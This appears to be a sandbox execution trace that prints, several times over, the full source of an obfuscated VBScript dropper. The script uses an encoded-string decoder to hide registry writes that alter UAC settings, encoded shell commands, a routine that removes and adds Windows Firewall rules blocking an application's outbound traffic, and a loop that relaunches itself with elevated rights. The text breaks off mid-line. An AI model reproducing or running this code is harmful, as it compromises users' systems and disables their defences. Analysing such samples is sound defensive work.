bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0222.919] wcsncmp (_String1="n Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.919] wcsncmp (_String1=" Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.919] wcsncmp (_String1="Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0222.919] wcsncmp (_String1="rror Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 